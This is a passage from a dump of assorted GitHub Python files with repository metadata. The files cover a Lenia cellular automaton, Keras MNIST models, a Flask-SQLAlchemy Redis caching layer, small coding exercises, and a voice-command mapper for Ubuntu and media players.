num_included_worlds=0):\n if num_included_worlds > self.num_channels:\n raise ValueError(\n \"num_included_worlds is greater than the number of channels\"\n )\n num_params = 0\n\n world_shape = np.shape(self.worlds)\n num_world_params = np.prod(world_shape[1:]) * (num_included_worlds)\n num_params += num_world_params\n\n for channel_kernel_list in self.kernels:\n for kernel_group in channel_kernel_list:\n for channel in kernel_group.keys():\n kernel_size = np.size(kernel_group[channel])\n growth_param_size = 4\n num_weights = 1\n\n num_params += kernel_size + growth_param_size + num_weights\n\n # for time step\n num_params += 1\n\n return num_params\n\n def _growth(self, input, scaling, mean_bias, std, interpolation):\n mean_bias = 20 * (mean_bias - 0.5)\n sigmoid = 2 / (1 + np.exp((-input + mean_bias) / std)) - 1\n bell = 2 * np.exp(-(((input - mean_bias) / std) ** 2) / 2) - 1\n\n return scaling * ((1 - interpolation) * sigmoid + interpolation * bell)\n\n def _clip(self, x):\n return np.clip(x, 0, 1)\n\n\ndef LeniaConstructor(\n num_channels, time_step, kernel_radius, world_shape, kernel_architecture\n):\n worlds_init = np.random.uniform(size=(num_channels, *world_shape))\n\n kernel_size = 2 * kernel_radius + 1\n kernel_shape = tuple([kernel_size for x in world_shape])\n kernels = []\n kernel_weights = []\n growth_params = []\n for channel_kernel_list in kernel_architecture:\n channel_kernel_groups = []\n channel_kernel_weights_groups = []\n channel_growth_param_groups = []\n for convolve_channel_group in channel_kernel_list:\n channel_kernel_group = {}\n channel_kernel_weights_group = {}\n for channel in convolve_channel_group:\n channel_kernel_group[channel] = np.random.uniform(size=kernel_shape)\n channel_kernel_weights_group[channel] = np.random.uniform()\n channel_kernel_groups.append(channel_kernel_group)\n channel_kernel_weights_groups.append(channel_kernel_weights_group)\n channel_growth_param_groups.append(np.random.uniform(size=(4)))\n kernels.append(channel_kernel_groups)\n kernel_weights.append(channel_kernel_weights_groups)\n growth_params.append(channel_growth_param_groups)\n\n return Lenia(\n worlds_init, kernels, kernel_weights, growth_params, num_channels, time_step\n )\n\n","repo_name":"joshnunley/visual-cartpole","sub_path":"neural_lenia.py","file_name":"neural_lenia.py","file_ext":"py","file_size_in_byte":7844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17220552869","text":"import os\nimport inspect\nfrom pcsg import tool\nfrom pcsg.util import cache\nfrom pcsg.attributes import Attributes\nfrom pcsg.util.external import openscad\n\n\n\n\n# default style definitions\nThumbnailWidth = 320\nThumbnailHeight = 240\nImageWidth = 800\nImageHeight = 600\n\n\n\n\ndef initialize (cachePath):\n \"\"\"\n Initialize the example image builder.\n \"\"\"\n cache.setup (cachePath)\n\n\n\n\ndef getDefaultAttributes ():\n \"\"\"\n Get default attributes for running the exampleimg renderer.\n \"\"\"\n attrs = Attributes.defaults ()\n attrs = attrs.override ({\n 'render.quality': 1,\n 'render.antialias': 1,\n 'rasterize.minAngle': 2,\n 'rasterize.minSize': 0.03,\n 'camera.projection': 'orthogonal',\n 'render.colorScheme': 'PcsgTheme'\n })\n return attrs\n\n\n\n\ndef getThumbnailImageAttributes ():\n \"\"\"\n Return attributes for building a thumbnail image.\n \"\"\"\n attrs = getDefaultAttributes ()\n attrs = attrs.override ({\n 'render.width': ThumbnailWidth,\n 'render.height': ThumbnailHeight,\n 'render.view.axis': True,\n 'render.view.scales': False\n })\n return attrs\n\n\n\n\ndef getImageAttributes ():\n \"\"\"\n Return attributes for building an image.\n \"\"\"\n attrs = getDefaultAttributes ()\n attrs = attrs.override ({\n 'render.width': ImageWidth,\n 'render.height': ImageHeight,\n 'render.view.axis': True,\n 'render.view.scales': True\n })\n return attrs\n\n\n\n\ndef renderImageThumbnail (createSceneFunc, cachePath):\n \"\"\"\n Renders an example image thumbnail.\n \"\"\"\n if inspect.isclass (createSceneFunc):\n if issubclass (createSceneFunc, tool.Tool):\n # calculate example output name\n outputNamePrefix = cachePath + os.path.sep + str (createSceneFunc.__qualname__) + \".thumb\"\n\n # create and run tool instance\n instance = createSceneFunc ()\n commandLineOptions = [\n 'render',\n outputNamePrefix,\n '--fmt', 'png',\n '--cache', cachePath,\n '-w', str (ThumbnailWidth),\n '-h', str (ThumbnailHeight),\n '-z'\n ]\n instance.run (commandLineOptions)\n\n # return output path\n return [outputNamePrefix + '.png']\n else:\n assert False, \"unexpected class\"\n\n else:\n # render csg tree\n attributes = getThumbnailImageAttributes ()\n result = createSceneFunc (attributes, True)\n images = []\n for pair in result:\n images.append (openscad.getRendering ('png', pair[1], pair[0]))\n return images\n\n\n\n\ndef renderImage (createSceneFunc, cachePath):\n \"\"\"\n Renders an example image.\n \"\"\"\n if inspect.isclass (createSceneFunc):\n if issubclass (createSceneFunc, tool.Tool):\n # calculate example output name\n outputNamePrefix = cachePath + os.path.sep + str (createSceneFunc.__qualname__) + \".img\"\n\n # create and run tool instance\n instance = createSceneFunc ()\n commandLineOptions = [\n 'render',\n outputNamePrefix,\n '--fmt', 'png',\n '--cache', cachePath,\n '-w', str (ImageWidth),\n '-h', str (ImageHeight),\n '-z'\n ]\n instance.run (commandLineOptions)\n\n # return output path\n return [outputNamePrefix + '.png']\n else:\n assert False, \"unexpected class\"\n\n else:\n # render csg tree\n attributes = getImageAttributes ()\n result = createSceneFunc (attributes, False)\n images = []\n for pair in result:\n images.append (openscad.getRendering ('png', pair[1], pair[0]))\n return images\n","repo_name":"WhiteSheet/pcsg","sub_path":"doc/source/ext/exampleimg/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72282269289","text":"# 자카드 유사도 = 교집합 크기 / 합집합 크기\n# 중복값 유의\n# 대문자와 소문자를 같게 취급\n# 최종 유사도에 65536을 곱해서 출력\n\n##### 풀이\n# 두개씩 끊어서 .upper()해준 뒤 리스트에 삽입\n# (합집합 = 전체개수 - 교집합)이므로\n### 교집합구하기\n# 이중반복문과 visited사용해서 교집합 구하기\n\ndef solution(str1, str2): # 2<= <=1000\n answer = 0\n s1_list = []\n s2_list = []\n \n for i in range(0,len(str1)-1):\n s = str1[i].upper()+str1[i+1].upper()\n if s.isalpha():\n s1_list.append(s) #\t['FR', 'RA', 'AN', 'NC', 'CE']\n for i in range(0,len(str2)-1):\n s = str2[i].upper()+str2[i+1].upper()\n if s.isalpha():\n s2_list.append(s) # ['FR', 'RE', 'EN', 'NC', 'CH']\n #print(s1_list)\n #print(s2_list)\n \n share_cnt = 0 # 교집합 개수\n visited = [False]*len(s2_list)\n for s1 in s1_list:\n for s2_i in range(len(s2_list)):\n if s1 == s2_list[s2_i]:\n if visited[s2_i] == False:\n visited[s2_i] = True\n share_cnt += 1\n break\n \n sum_cnt = len(s1_list) + len(s2_list) - share_cnt\n #print(\"share\", share_cnt)\n #print(\"sum\", sum_cnt)\n if share_cnt == 0 and sum_cnt == 0:\n answer = 1\n else:\n answer = share_cnt / sum_cnt\n \n return int(answer*65536)\n","repo_name":"yoo-myeong/Myeongorithm","sub_path":"python/프로그래머스_[1차] 뉴스 클러스터링.py","file_name":"프로그래머스_[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4861054590","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 26 16:33:37 2019\n\n@author: Anastasija\n\"\"\"\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D\nfrom keras.layers import Dense\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data() \n\n\ndef reshapeData(data,vectorDimension):\n dataReshaped = data.reshape(data.shape[0],28,28,1) \n return dataReshaped\n\ndef prepareData(data):\n data = data.astype('float32')\n data = data/255\n return data\n\ndef toCategoricalMatrix(data):\n dataCat = np_utils.to_categorical(data)\n return dataCat\n\ndef ucitajModel():\n model = initModel();\n model.load_weights(\"weights.h5\")\n return model\n\ndef initModel():\n model = Sequential()\n model.add(Conv2D(30, kernel_size=(5, 5), activation='relu',input_shape=(28,28,1)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(15, kernel_size=(3, 3), activation='relu'))\n \n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.2))\n \n model.add(Flatten())\n \n model.add(Dense(128, activation='relu'))\n model.add(Dense(50, activation='relu')) \n model.add(Dense(10, activation='softmax'))\n \n #Compile model \n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n \n return model\n\nx_train = reshapeData(x_train,x_train[0].shape[0] * x_train[0].shape[1]) \nx_test = reshapeData(x_test,x_test[0].shape[0] * x_test[0].shape[1]) \nx_train = prepareData(x_train)\nx_test = prepareData(x_test) \ny_train =toCategoricalMatrix(y_train)\ny_test =toCategoricalMatrix(y_test)\n\n \n#model = initModel()\n#print(model.summary()) \n#history = model.fit(x_train,y_train,32,epochs = 10,validation_split = 0.25)\n#scores = model.evaluate(x_test, y_test, verbose=1)\n#print(\"Baseline Error: %.2f%%\" % (100-scores[1]*100))\n#model.save_weights(\"weights.h5\")\n \n ","repo_name":"rudananastasija/soft","sub_path":"data_train.py","file_name":"data_train.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17220749239","text":"from os.path import basename, splitext\n\nfrom keras.layers import MaxPooling2D, Convolution2D, Dropout, Dense, Flatten\nfrom keras.models import Sequential\n\n\ndef get_model_id():\n return splitext(basename(__file__))[0]\n\n\ndef build(training_data, height=28, width=28):\n # Initialize data\n _, _, _, nb_classes = training_data\n input_shape = (height, width, 1)\n\n # Hyperparameters\n nb_filters = 32 # number of convolutional filters to use\n pool_size = (2, 2) # size of pooling area for max pooling\n kernel_size = (3, 3) # convolution kernel size\n\n model = Sequential()\n model.add(Convolution2D(nb_filters,\n kernel_size,\n padding='valid',\n input_shape=input_shape,\n activation='relu'))\n model.add(Convolution2D(nb_filters,\n kernel_size,\n activation='relu'))\n\n model.add(MaxPooling2D(pool_size=pool_size))\n model.add(Dropout(0.25))\n model.add(Flatten())\n\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(nb_classes, activation='softmax'))\n\n return model\n","repo_name":"WhiteboardLiveCoding/OCRTraining","sub_path":"models/convolutional.py","file_name":"convolutional.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16267889300","text":"from transformers import pipeline\nimport sys\nimport logging\nlogging.getLogger().setLevel(logging.CRITICAL)\n\n\nlogging.getLogger().setLevel(logging.CRITICAL)\n\n\ndef get_highest_emotion_score(output):\n # Use the 'max' function with a key function that returns the 'score' of each dictionary\n highest_emotion = max(output[0], key=lambda emotion: emotion['score'])\n return highest_emotion['label']\n\n\ndef get_emotion(text):\n classifier = pipeline(\"text-classification\",\n model=\"SamLowe/roberta-base-go_emotions\", top_k=None)\n emotion = get_highest_emotion_score(classifier(text))\n return emotion\n\n\nif __name__ == '__main__':\n text = sys.argv[1]\n emotion = get_emotion(text)\n if emotion is not None:\n print(emotion.strip())\n else:\n print(\"\")\n","repo_name":"AznIronMan/nlp_tools","sub_path":"emotions.py","file_name":"emotions.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"949746232","text":"# -*- coding: utf-8 -*-\nimport importlib\nimport itertools\nimport warnings\n\nimport functools\nfrom blinker import signal\nfrom dogpile.cache.api import NO_VALUE\nfrom flask_sqlalchemy import DefaultMeta, Model\nfrom sqlalchemy.ext.declarative import declared_attr\nfrom sqlalchemy import event, inspect\nfrom sqlalchemy.orm.attributes import get_history\nfrom sqlalchemy.orm.base import PASSIVE_NO_INITIALIZE\n\nfrom .utils import current_redica\nfrom .cache import FromCache\n\n\nclass Cache(object):\n default_regions = None\n\n def __init__(self, model, regions, label,\n columns=None, exclude_columns=None,\n invalidate_queries=None, invalidate_relationships=None,\n expiration_time=None):\n self.model = model\n self.cache_regions = regions\n self.label = label\n self.pk = getattr(model, 'cache_pk', 'id')\n self.exclude_columns = set(exclude_columns) \\\n if exclude_columns else set()\n self.columns = set(columns) if columns else set()\n self.invalidate_queries = invalidate_queries\n self.invalidate_relationships = invalidate_relationships\n self.expiration_time = expiration_time\n\n @property\n def regions(self):\n return self.cache_regions or self.default_regions\n\n def get(self, pk):\n return self.model.query.options(self.from_cache(pk=pk)).get(pk)\n\n def filter(self, **kwargs):\n limit = kwargs.pop('limit', None)\n offset = kwargs.pop('offset', None)\n order_by = kwargs.pop('order_by', 'asc')\n\n query_kwargs = {}\n if kwargs:\n if len(kwargs) > 1:\n raise TypeError(\n 'filter accept only one attribute for filtering')\n key, value = kwargs.items()[0]\n if key == self.pk:\n yield self.get(value)\n return\n\n if key not in self._columns:\n raise TypeError('%s does not have an attribute %s' % self, key)\n query_kwargs[key] = value\n\n cache_key = self.cache_key(**kwargs)\n\n pks = self.regions[self.label].get(cache_key)\n\n if pks is NO_VALUE:\n pks = [o.id for o in self.model.query.filter_by(\n **query_kwargs).with_entities(getattr(self.model, self.pk))]\n self.regions[self.label].set(cache_key, pks)\n\n if order_by == 'desc':\n pks.reverse()\n\n if offset is not None:\n pks = pks[pks:]\n\n if limit is not None:\n pks = pks[:limit]\n\n keys = [self.cache_key(pk) for pk in pks]\n for pos, obj in enumerate(self.regions[self.label].get_multi(keys)):\n if obj is NO_VALUE:\n yield self.get(pks[pos])\n else:\n yield obj[0]\n\n def flush(self, key):\n self.regions[self.label].delete(key, key_mangle=True)\n\n def keys(self, key_pattern):\n return self.regions[self.label].backend.keys(key_pattern)\n\n def flush_multi(self, key_pattern):\n if not key_pattern.endswith('*'):\n key_pattern += '*'\n backend = self.regions[self.label].backend\n keys = backend.keys(key_pattern)\n if len(keys) > 0:\n backend.delete_multi(keys)\n\n @property\n def _columns(self):\n if not self.columns:\n self.columns = set([\n c.name for c in self.model.__table__.columns\n if c.name != self.pk and c.name not in self.exclude_columns])\n\n return self.columns\n\n def from_cache(self, cache_key=None, pk=None, prefix=None,\n expiration_time=None):\n if pk:\n cache_key = self.cache_key(pk)\n expiration_time = expiration_time or self.expiration_time\n return FromCache(\n self.label, cache_key, query_prefix=prefix,\n cache_regions=self.regions, expiration_time=expiration_time)\n\n def cache_key(self, pk='all', **kwargs):\n q_filter = u''.join(u'{}={}'.format(k, v) for k, v in kwargs.items()) \\\n or self.pk\n return u\"{}:{}:object:{}\".format(\n self.model.__table__, pk, q_filter)\n\n def cache_relationship_key(self, pk, relation_name):\n return u'{}:{}:relationship:{}'.format(\n self.model.__tablename__, pk, relation_name)\n\n def cache_query_key(self, pk, query_name):\n if query_name:\n return u'{}:{}:query:{}'.format(\n self.model.__tablename__, pk, query_name)\n else:\n return u'{}:{}:query'.format(self.model.__tablename__, pk)\n\n def flush_filters(self, obj):\n keys = self._filter_keys(obj)\n keys.append(self.cache_key())\n\n obj_pk = getattr(obj, self.pk)\n if obj_pk:\n keys.append(self.cache_key(obj_pk))\n\n if len(keys) > 0:\n self.regions[self.label].delete_multi(keys)\n\n def _filter_keys(self, obj):\n keys = []\n for column in self._columns:\n added, _, deleted = get_history(\n obj, column, passive=PASSIVE_NO_INITIALIZE)\n for value in itertools.chain(added or (), deleted or ()):\n keys.append(self.cache_key(**{column: value}))\n return keys\n\n def flush_caches(self, obj_pk):\n patterns = self._pattern_keys(obj_pk)\n\n backend = self.regions[self.label].backend\n ppl = backend.pipeline()\n for p in itertools.imap(lambda k: backend.key_mangler(k), patterns):\n ppl.keys(p)\n\n keys = []\n for rs in ppl.execute():\n if not rs:\n continue\n keys.extend(rs)\n if len(keys) > 0:\n backend.delete_multi(keys)\n\n def _pattern_keys(self, obj_pk):\n keys = []\n\n if self.invalidate_relationships:\n for r in self.invalidate_relationships:\n keys.append(self.cache_relationship_key(obj_pk, r))\n else:\n keys.append(self.cache_relationship_key(obj_pk, '*'))\n\n if self.invalidate_queries:\n for q in self.invalidate_queries:\n keys.append(self.cache_query_key(obj_pk, q))\n else:\n keys.append(self.cache_query_key(obj_pk, '*'))\n\n return keys\n\n def flush_all(self, obj):\n self.flush_filters(obj)\n\n obj_pk = getattr(obj, self.pk)\n if obj_pk:\n self.flush_caches(obj_pk)\n\n\n_flush_signal = signal('flask_sqlalchemy_redica_flush_signal')\n\n\nclass CachingConfigure(object):\n #: enable cache\n cache_enable = True\n\n #: specify user custom dogpile regions\n #: if not specifed, use the default regions created by redica\n cache_regions = None\n\n #: specify which dogpile region to use\n cache_label = 'default'\n\n #: cache expiration time, default is 1 hour\n cache_expiration_time = 3600\n\n #: if not specified, cache will expire all queries of this object\n cache_queries = ()\n\n #: if not specified, cache will expire all relationships of this object\n cache_relationships = ()\n\n #: only these columns will produce cache indices\n cache_columns = ()\n\n #: these columns will not produce cache indices\n cache_exclude_columns = ()\n\n #: enable cache invalidation\n #: if disabled, cache will only expired until timeout\n #: if enabled, when object changes, cache will invalidate automatically\n cache_invalidate = True\n\n #: only these columns will produce cache invalidate\n cache_invalidate_columns = ()\n\n #: these columns changes will not produce cache invalidate\n cache_invalidate_exclude_columns = ()\n\n #: enable cache invalidate notification\n #: some mapper class can be used only for notification\n #: itself cannot cache and invalidate\n cache_invalidate_notify = False\n\n #: which relation objects will be notified\n cache_invalidate_notify_relationships = ()\n\n #: notify with origin all the way to target\n cache_invalidate_notify_with_origin = False\n\n # private properties\n _initialized = False\n _all_columns = ()\n\n\nclass CachingMixin(CachingConfigure):\n \"\"\"mixin for caching models.\"\"\"\n\n @declared_attr.cascading\n def cache(cls):\n \"\"\"cache object implementation, will be used like::\n\n obj = SomeModel.cache.get(id)\n \"\"\"\n if cls.cache_enable:\n return Cache(\n cls, cls.cache_regions, cls.cache_label,\n columns=cls.cache_columns,\n exclude_columns=cls.cache_exclude_columns,\n invalidate_relationships=cls.cache_relationships,\n invalidate_queries=cls.cache_queries,\n expiration_time=cls.cache_expiration_time\n )\n\n @declared_attr.cascading\n def use_cache(cls):\n \"\"\"Helpers for return if this object use cache\n \"\"\"\n return hasattr(cls, 'cache') and getattr(cls, 'cache_enable')\n\n @classmethod\n def from_cache(cls, pk='all'):\n query_prefix = cls.query_cache_key(pk, '')\n return cls.cache.from_cache(prefix=query_prefix)\n\n @classmethod\n def relationship_cache_key(cls, pk, relation_name):\n return cls.cache.cache_relationship_key(pk, relation_name)\n\n @classmethod\n def query_cache_key(cls, pk, query_name):\n return cls.cache.cache_query_key(pk, query_name)\n\n @staticmethod\n def invalidator():\n if current_redica:\n return current_redica.cache_invalidator\n\n @classmethod\n def __declare_last__(cls):\n if cls._initialized:\n return\n\n if cls.cache_enable is False:\n cls.cache_invalidate = False\n\n if len(cls.cache_invalidate_notify_relationships) > 0:\n cls.cache_invalidate_notify = True\n\n if cls.cache_invalidate or cls.cache_invalidate_notify:\n cls.configure_caching()\n\n cls._initialized = True\n\n @classmethod\n def configure_caching(cls):\n mapper = inspect(cls).mapper\n sender = mapper.class_.__name__\n cls.listen_mapper_events(mapper, sender, cls.on_model_change)\n _flush_signal.connect(\n cls.on_model_invalidate, sender=sender, weak=False)\n\n base_mapper = inspect(cls).mapper.base_mapper\n if base_mapper != mapper:\n sender = base_mapper.class_.__name__\n\n if cls.cache_invalidate or cls.cache_invalidate_notify:\n cls.listen_mapper_events(base_mapper, sender,\n cls.on_model_change)\n\n _flush_signal.connect(\n cls.on_model_invalidate, sender=sender, weak=False)\n\n cls.init_invalidate_columns(mapper)\n\n @classmethod\n def init_invalidate_columns(cls, mapper):\n cls._all_columns = set(mapper.attrs.keys())\n cls.cache_invalidate_columns = \\\n cls.cache_invalidate_columns or \\\n set(cls._all_columns) - set(cls.cache_invalidate_exclude_columns)\n\n @classmethod\n def listen_mapper_events(cls, mapper, sender, callback):\n object_update_callback = functools.partial(\n callback, sender, 'update')\n object_delete_callback = functools.partial(\n callback, sender, 'delete')\n object_insert_callback = functools.partial(\n callback, sender, 'insert')\n event.listen(mapper, 'after_update', object_update_callback)\n event.listen(mapper, 'after_delete', object_delete_callback)\n event.listen(mapper, 'after_insert', object_insert_callback)\n\n @classmethod\n def on_model_change(cls, *args):\n sender, ev, _, _, target = args\n kwargs = dict(event=ev, source='model_change',\n module=cls.__module__, model=sender,\n target=target, target_id=target.id)\n if cls.cache_invalidate_notify_with_origin:\n kwargs.update(\n dict(origin_module=cls.__module__, origin_model=sender,\n origin_target=target, origin_target_id=target.id))\n _flush_signal.send(sender, **kwargs)\n\n @classmethod\n def on_model_invalidate(cls, sender, **kw):\n target = kw.get('target')\n src = kw.get('source')\n ev = kw.get('event')\n\n dummy_update = (\n src == 'model_change' and\n ev == 'update' and\n not cls.has_changes(target)\n )\n\n if cls.cache_invalidate:\n if dummy_update:\n # for self update, if no changes, then neither\n # flush nor notify others\n return\n cls.on_flush(**kw)\n elif dummy_update:\n return\n\n if not cls.cache_invalidate_notify:\n return\n\n delay = True\n if ev == 'delete' or src != 'model_change':\n # deletion need flush right away\n delay = False\n\n cls.on_notify(delay=delay, **kw)\n\n @classmethod\n def has_changes(cls, target, use_all=False):\n columns = cls._all_columns if use_all else cls.cache_invalidate_columns\n for column in columns:\n if get_history(target, column,\n passive=PASSIVE_NO_INITIALIZE).has_changes():\n return True\n\n @classmethod\n def relation_changes(cls, target, attr, r):\n history = get_history(target, r)\n if attr.back_populates \\\n and attr.cascade_backrefs \\\n and history.has_changes():\n # backref can update itself\n # no need to broadcast signals\n change_set = history.unchanged or ()\n else:\n change_set = history.sum()\n\n for obj in change_set:\n if not obj or obj.id is None:\n # for new obj, it will flush by itself,\n # no need to broadcast signal\n continue\n\n yield obj\n\n @classmethod\n def on_notify(cls, delay=False, **kw):\n target = kw.get('target')\n ev = kw.get('event')\n\n if not target:\n return\n\n mapper = inspect(cls).mapper\n for r in cls.cache_invalidate_notify_relationships:\n attr = mapper.attrs.get(r)\n sender = attr.mapper.class_.__name__\n if not attr.uselist and not getattr(cls, r).impl.active_history:\n warnings.warn(\n 'Scalar relationship %s is with no active_history set. '\n 'Unfetched instance won\\'t be notified.' % attr)\n for obj in cls.relation_changes(target, attr, r):\n kwargs = dict(\n module=attr.mapper.class_.__module__, model=sender,\n target=obj, target_id=obj.id, event=ev, source='notify',\n origin_module=kw.get('origin_module', None),\n origin_model=kw.get('origin_model', None),\n origin_target=kw.get('origin_target', None),\n origin_target_id=kw.get('origin_target_id', None))\n if delay:\n invalidator = cls.invalidator()\n if invalidator:\n invalidator.invalidate(**kwargs)\n else:\n _flush_signal.send(sender, **kwargs)\n\n @classmethod\n def _flush_all(cls, target_id, target):\n if target:\n cls.cache.flush_all(target)\n elif target_id:\n cls.cache.flush_caches(target_id)\n\n @classmethod\n def on_flush(cls, **kw):\n if cls.cache_enable and cls.cache_invalidate:\n target = kw.get('target')\n target_id = kw.get('target_id')\n cls._flush_all(target_id, target)\n\n\nclass CachingInvalidator(object):\n def __init__(self, callback=None):\n self.items = []\n self.callback = callback or self.do_flush\n\n def invalidate(self, **kwargs):\n self.items.append(kwargs)\n\n @staticmethod\n def do_flush(items):\n if current_redica:\n session = current_redica.create_scoped_session()\n for info in items:\n module = info.get('module')\n model = info.get('model')\n target_id = info.get('target_id')\n model_cls = getattr(importlib.import_module(module), model)\n target = session.query(model_cls).get(target_id)\n\n info['target'] = target\n info['source'] = 'flush'\n\n origin_module = info.get('origin_module', None)\n origin_model = info.get('origin_model', None)\n origin_target_id = info.get('origin_target_id', None)\n if origin_module and origin_model and origin_target_id:\n origin_model_cls = getattr(\n importlib.import_module(origin_module), origin_model)\n origin_target = session.query(\n origin_model_cls).get(origin_target_id)\n info['origin_target'] = origin_target\n\n _flush_signal.send(model, **info)\n session.close()\n\n def flush(self):\n items = list(self.items)\n self.items = []\n self.callback(items)\n\n\nclass CeleryCachingInvalidator(CachingInvalidator):\n def invalidate(self, **kwargs):\n kwargs.pop('target', None)\n kwargs.pop('origin_target', None)\n super(CeleryCachingInvalidator, self).invalidate(**kwargs)\n\n def flush(self):\n items = list(self.items)\n self.items = []\n self.callback.delay(items)\n\n\ndef default_caching_invalidate(items):\n CachingInvalidator.do_flush(items)\n\n\ncaching_attributes = [\n (k, v) for k, v in CachingConfigure.__dict__.items()\n if not k.startswith('__')]\n\n\nclass CachingMeta(DefaultMeta):\n def __init__(cls, *args):\n name, bases, dct = args\n super(CachingMeta, cls).__init__(*args)\n\n if any(itertools.imap(\n lambda x: x != Model and issubclass(x, Model), bases)):\n for k, v in caching_attributes:\n if k not in dct:\n setattr(cls, k, v)\n","repo_name":"cohirer2019/Flask-Sqlalchemy-Redica","sub_path":"flask_sqlalchemy_redica/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":17924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38200968388","text":"MEASUREMENTS_EXCEED_WORLD_RECORDS_MESSAGE = (\n \"Deve ser menor ou igual ao valor máximo permitido.\"\n)\nWEIGHT_LESS_THAN_OR_EQUAL_TO_ZERO_MESSAGE = \"Peso inválido. Deve ser maior do que zero\"\nINVALID_VALUE_MESSAGE = \"Valor inválido. Apenas números são aceitos\"\nHEIGHT_LESS_THAN_OR_EQUAL_TO_ZERO_MESSAGE = (\n \"Altura inválida. Deve ser maior do que zero\"\n)\nMAX_METRIC_HEIGHT = 2.51\nMAX_METRIC_WEIGHT = 635.0\nMAX_IMPERIAL_HEIGHT = 107\nMAX_IMPERIAL_WEIGHT = 1400\nTYPE_CHOICES = [\"metric\", \"imperial\"]\n","repo_name":"GiuliaMarcela/clean-bmi-calculator","sub_path":"src/common/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24636842516","text":"class DVD:\n def __init__(self, name: str, dvd_id: int, creation_year: int, creation_month: str, age_restriction):\n self.is_rented = False\n self.name = name\n self.id = dvd_id\n self.creation_year = creation_year\n self.creation_month = creation_month\n self.age_restriction = age_restriction\n\n @classmethod\n def from_date(cls, dvd_id: int, name: str, date: str, age_restriction: int):\n day, month, year = date.split(\".\")\n return cls(name, dvd_id, int(year), DVD.convert_date(month), age_restriction)\n\n @staticmethod\n def convert_date(month):\n dates = {1: \"January\", 2: \"February\", 3: \"March\", 4: \"April\",\n 5: \"May\", 6: \"June\", 7: \"July\", 8: \"August\",\n 9: \"September\", 10: \"October\", 11: \"November\", 12: \"December\"}\n return dates[int(month)]\n\n def status(self):\n if self.is_rented:\n return \"rented\"\n return \"not rented\"\n\n def __repr__(self):\n return f\"{self.id}: {self.name} ({self.creation_month} {self.creation_year}) has age restriction \" \\\n f\"{self.age_restriction}. Status: {self.status()}\"\n\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Python_OOP/Class_and_Static_Methods/Exercises/Movie_World/project/dvd.py","file_name":"dvd.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"21453084885","text":"import collections\n\nclass Solution:\n def checkInclusion(self, s1: str, s2: str) -> bool:\n counter1 = collections.Counter(s1)\n l, r = 0, len(s1)-1\n counter2 = collections.Counter(s2[l, r])\n while r < len(s2):\n counter2[s2[r]] += 1\n if counter1 == counter2:\n return True\n counter2[s2[l]] -= 1\n if counter2[s2[l]] == 0:\n del counter2[s2[l]]\n l += 1\n r += 1\n return False\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"567_Permutation_in_String/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2468498650","text":"import sys\nimport os\n\nclass Tofik:\n\t\n\tname = \"Tofik\"\n\t\n\tvoiceOn = True\n\t\n\tcommands = {\n\t\t'voice on': 'turn voice recognition off',\n\t\t'voice off': 'turn voice recognition on' \n\t}\n\t\n\tdef parse(self, word):\n\t\tif word == 'voice on':\n\t\t\tself.voiceOn = True\n\t\telif word == 'voice off':\n\t\t\tself.voiceOn = False\n\nclass Ubuntu:\n\n\tname = \"Ubuntu\"\n\n\tcommands = {\n\t\t'lock screen': 'gnome-screensaver-command -l' \n\t}\n\n\tdef parse(self, word):\n\t\t\n\t\tif word in self.commands:\n\t\t\treturn self.commands[word]\n\nclass Rhythmbox:\n\t\n\tname = \"Rhythmbox\"\n\t\n\tcommands = {\n\t\t\t'play': 'play',\n\t\t\t'pause': 'pause',\n\t\t\t'next': 'next',\n\t\t\t'prev': 'previous',\n\t\t\t'show': 'notify',\n\t\t\t'pause': 'pause',\n\t\t\t'silence': 'pause',\n\t\t\t'volume up':'volume-up',\n\t\t\t'volume down':'volume-down',\n\t\t\t'print volume':'print-volume'\t\t\t\n\t}\n\t\n\tdef parse(self, word):\n\t\t\t\t\t\n\t\tif word in self.commands:\n\t\t\tnotification = \"notify-send -t 1000 'Rhythmbox COMMAND' ;\".replace('COMMAND', self.commands[word].title())\n\t\t\treturn notification + \" rhythmbox-client --COMMAND\".replace('COMMAND', self.commands[word])\n\nclass Banshee:\n\t\n\tname = \"Banshee\"\n\t\n\tcommands = {\n\t\t\t'play': 'play',\n\t\t\t'pause': 'pause',\n\t\t\t'stop': 'stop',\n\t\t\t'next': 'next',\n\t\t\t'prev': 'previous',\n\t\t\t'pause': 'pause',\n\t\t\t'silence': 